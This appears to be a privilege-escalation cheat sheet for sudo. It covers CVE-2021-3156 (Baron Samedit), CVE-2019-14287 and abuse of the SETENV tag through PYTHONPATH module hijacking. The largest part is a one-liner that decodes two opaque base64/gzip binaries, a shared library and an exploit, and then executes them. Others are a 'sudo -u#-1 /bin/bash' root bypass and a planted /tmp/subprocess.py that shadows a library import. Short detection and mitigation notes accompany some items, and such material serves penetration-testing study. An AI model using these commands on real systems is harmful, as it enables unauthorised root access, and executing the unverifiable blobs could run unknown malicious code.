🐧 SUDO

Escape CMD

CVE-2021-3156

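The host is likely vulnerable if sudoedit -s '\' `perl -e 'print "A" x 65536'` crashes with an error such as “malloc(): corrupted top size Aborted (core dumped)”. A patched sudo (1.9.5p2 or later) rejects the arguments and prints a usage message instead.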
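Pre-compiled exploit command. The one-liner below decodes two base64-encoded, gzip-compressed binaries (libnss_X/X.so.2 and exploit), marks the second one executable and runs it. The blobs are opaque: this page gives neither their source nor a hash, so their contents cannot be verified from the listing.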
mkdir -p libnss_X/ &&echo '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'|base64 -d|gzip -d>libnss_X/X.so.2 &&echo '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'|base64 -d|gzip -d>exploit &&chmod 755 exploit &&./exploit

CVE-2019-14287

# sudo -l => "user1 myhost = (ALL, !root) /bin/bash"
# CVE-2019-14287 (fixed in sudo 1.8.28): the rule above is meant to let user1
# run bash as any user except root. On affected versions the numeric ID -1
# (also written 4294967295) is not changed by the setuid call sudo makes, so
# the command ends up running as UID 0 and the "!root" exclusion is bypassed.
# Detection: per the sudo advisory, the log entry for such a run lists the
# target user as 4294967295 rather than root.
# Mitigation: upgrade sudo; avoid Runas lists that pair ALL with a negation.
sudo -u#-1 /bin/bash

SETENV

The sudoers SETENV tag lets the invoking user set environment variables on the sudo command line for the tagged command:
# ALL=(ALL:ALL) /bin/su
$ sudo K=1 su
sudo: sorry, you are not allowed to set the following environment variables: K

# ALL=(ALL:ALL) SETENV: /bin/su
$ sudo K=1 su
root@host:/# echo $K
1
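Combined with the PYTHONPATH environment variable, SETENV lets the caller hijack Python library imports: directories listed in PYTHONPATH are searched before the standard library, so a module with the same name placed there is loaded instead of the real one.
The exposure comes from granting SETENV on a command that runs an interpreter; dropping the tag, or running the script in Python's isolated mode (python3 -I, which ignores PYTHON* variables), closes it. Consider the following python3 script and how the user abuses it: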
# Legitimate script example: a small helper that imports the standard-library
# subprocess module by name and prints the user it runs as.
cat >legit.py <<'PY'
#!/usr/bin/python3
import subprocess
subprocess.run(["whoami"])
PY


# Expected Usage
$ sudo python3 legit.py
root

# Create malicious subprocess library
# The file name matches the standard-library module that legit.py imports, and
# /tmp is writable by any local user. The file only shadows the real module if
# its directory is on Python's module search path ahead of the standard library.
echo '
def run(_):
  print("EVIL")
'>/tmp/subprocess.py

# Run with fake library path
$ sudo PYTHONPATH=/tmp/ python3 legit.py
EVIL